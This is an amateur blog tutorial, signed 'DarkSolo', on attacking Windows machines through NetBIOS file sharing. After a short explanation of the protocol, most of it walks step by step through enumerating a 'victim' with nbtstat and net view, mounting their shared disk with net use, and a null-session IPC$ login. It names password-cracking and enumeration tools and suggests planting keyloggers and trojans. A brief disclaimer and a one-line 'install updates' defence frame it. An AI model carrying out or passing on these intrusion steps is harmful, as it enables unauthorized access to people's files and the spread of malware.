<<-- NetBIOS Attack -->>
Part 1
NetBIOS which stands for "Network Basic Input Output System" allows other nodes on a network to send data to each other over a LAN (Local Area Network). It was released by IBM and later on Microsoft starting adapting it for it's own Operating System. Modern OS's are having NetBIOS Extended User Interface (NetBEUI) installed with them but in order to communicate over a WAN (Wide Are Network) you need to user another type of protocol such as TCP (Transmission Control Protocol) rather than NetBIOS.
When you request from NetBIOS it takes the form of a Network Control Block (NCB) that specifies a message location and a name of the destination.
NetBIOS makes use of the session and transport layers that are found in the OSI (Open Systems Interconnection) model. Though it does not provide a standard frame or frame format for data transmission. NetBEUI takes care in order to capsulate a standard frame.
The communication nodes found in NetBIOS are session or datagram. Session mode provides two nodes on the network to talk with each other and therefore creates a "session". It can handle bulky messages and takes care of error detection and recovery. On the other hand, Datagram mode is "connectionless" which means it uses UDP and the data being transmitted is not guaranteed that it will arrive to the destination. Therefore, the messages must be smaller, sent independently and is also responsible for error detection and recovery. Datagram mode can also send a broadcast message to all the machines connected on the LAN.
Part 2
In this tutorial we will be demonstrating one of the easiest ways hackers manage to gain access to your network infrastructure within minutes. I certainly most of all condemn the acts of a hacker but not opposed of an ethical hacker, one that has to works with the network administrators and aware them to path their systems for leaks and holes.
If you skimmed through Part 1, I strongly recommend that you go back and read that one first to get an idea of what NetBIOS really is. I'll continue stretching my explanation in this tutorial and I'll introduce a new exploit found in the Windows Operating System itself called the "NetBIOS Attack".
NetBIOS was developed by IBM and Sytek as an API (Application Programming Interface) for clients to share information over a LAN (Local Area Network). This commonly works on Windows 9x platforms such as Windows98, Windows Me, Windows NT etc.
Having that said, I have no doubt that you've must have clicked on the "Network Neighborhood" in order to access other nodes on the network. Do you know what happens you tend to click on it? Your machine requests the names of the computers connected to the network (LAN) in combination with NetBIOS. So what NetBIOS actually does is, it gives the names and general information of computers attached to the network. Such information includes:
Name of the Machine
User Name
Domain
Host Name
These are the most vital information that we need. Like any other service, each runs a specific port number, in this case NetBIOS runs either on 139 or 445.
Using the NBTSTAT Command
This is the command found in MSDOS in order to communicate with the NetBIOS. Once you have launched command prompt you will end up with this:
c:\ or c:\windows>
If you get something else written after the C:\ don't worry, just keep reading. It will still work. So, we want to get information about victim's machine so therefore we type the command:
c:\windows>nbtstat -a 255.255.255.255
255.255.255.255 will be used as an example. You end up with the following information about the victim's machine.
NetBIOS Remote Machine Name Table
Name Number Type Usage
==========================================================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
We have the MAC address, we might make use of that piece of information later on. It's written as a string of hexadecimal numbers.
Now, we have the name of NetBIOS session and the type of service it is running.
Types of Attacks
There are two types of attacks that can launched using NetBIOS such as:
1. Reading/Writing to a remote machine
2.Denial of Service (DoS) Attack
To search for a victim we need a port scanner which will aware us what type of Operating System and Services the victim is currently running. A port scanner will scan a given range to track down open ports on the system. A commonly notorious port scanner is "Orge" that will give out NetBIOS names of the remote machine.
You can also download an application called "nbtscan" from http://www.unixwiz.net/tools/nbtscan.html and it will provide you with open netBIOS nameservers.
Believe it or not, as stated already NetBIOS is one of the easiest hack there is. Though, it works with luck. The victim needs to hack "File and Sharing" enabled in order to take revenge over his or her machine.
Now let's suppose that we type:
c:\windows>nbtstat -a 255.255.255.255 and the following table turns up:
NetBIOS Remote Machine Name Table
Name Type Status
------------------------------------------------------------------------------------------------- user <00> UNIQUE Registered workgroup <00> GROUP Registered user <03> UNIQUE Registered user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
Bingo! The number <20> indicates as a number that the victim has enabled the "File and Printer Sharing" feature.
Note: If <20> doesn't show up, we can conclude that "File and Printer Sharing" is not enabled or if you are prompt with an error message saying "Host Not Found" then port 139 is closed, blocked by some type of firwall or the IP address doesn't exists.
We are nearly up the hill. Now, we need to know what type of files and folders/printers are being shared on the LAN network. There we use the following command:
c:\windows>net view \\255.255.255.255
Let suppose we get the following output
Shared resources at \\255.255.255.255 ComputerNameGoesHere
Share name Type Used as Comment
----------------------------------------------------------------------------------------------- CDISK Disk
The command completed successfully.
Here we know that we have a type of mechanism which is a Disk and assigned with a share name CDISK. To get further information we'll type:
Shared resources at \\255.255.255.255
ComputerNameGoesHere
Share name Type Used as Comment
----------------------------------------------------------------------------------------------- HP-15 Print
Here we know that the Victim has a Printer installed with the sharename Hp-15.
Let's say that the victim has a shared Printer. That's already a huge advantage, since we can print paper remotely without him noticing.
Now that we are equipped with the IP address of the victim, File and Printer Sharing is confirmed enabled and the victim's hard disk's name is CDISK the last step is to connect to it and seek more files and folders.
Therefore, we introduce the NET command.
Let's say that we want our new drive letter to be assigned as x: we can connect using this command:
C:\windows\net use x: \\255.255.255.255\CDISK
Note: X may be replaced with another other letter.
If everything goes well you will finally receive the message: "The command was completed successfully" .
Now all you have to do is double click on "My Computer" and VIOLA!!!
All files and Folders are accessible.
You can alter the files only if you have a certain degree of permissions enabled. You have just created a new drive x: on your computer. You can now enter the victim's hard drive anytime you like, as long you're still remotely connected to it.
<<-- Further Explanation -->>
There are cases where you try and connect to the victim's computer and you are requested for password. It's commonly set as "Administrator" though most of the time they change it to something else. There is a program which will do all the dirty work for you called "PQWAK". All it requires is the IP address and the Sharename of the host and it will decrypt the password hash within seconds.
Note: Passwords will only be cracked if the victim is running one of the following OS's;
Windows 95
Windows 98
Windows Me
<<-- The IPC$ Hidden Share Hack found in Windows NT, 2000, XP -->>
This is used in case the password isn't crackable. It will gain access to the victim's machine just by typing a single string command which will log in as a guest and not act as a password cracker itself. So, it's:
c:\windows\net use x: \\255.255.255.255\ipc$ "" /user:""
This will now actually gain access rights as the one explained above but it will prove useful information such as shared drives, names of user names, users that never logged in etc. Two tools that use this type of method are "Internet Periscope" and "enum" which is basically command line.
If you're lucky enough and have write access permissions you can place files on the hard drive such as keyloggers, trojans etc which will later on open further holes in the OS if the victim is lame enough to double click on the executable files and start the service.
<<-- How to Protect yourself from such an attack -->>
Visit the Microsoft Update's page and let the updates install automatically -
http://windowsupdate.microsoft.com
That's all for now, until then,
DarkSolo
No comments:
Post a Comment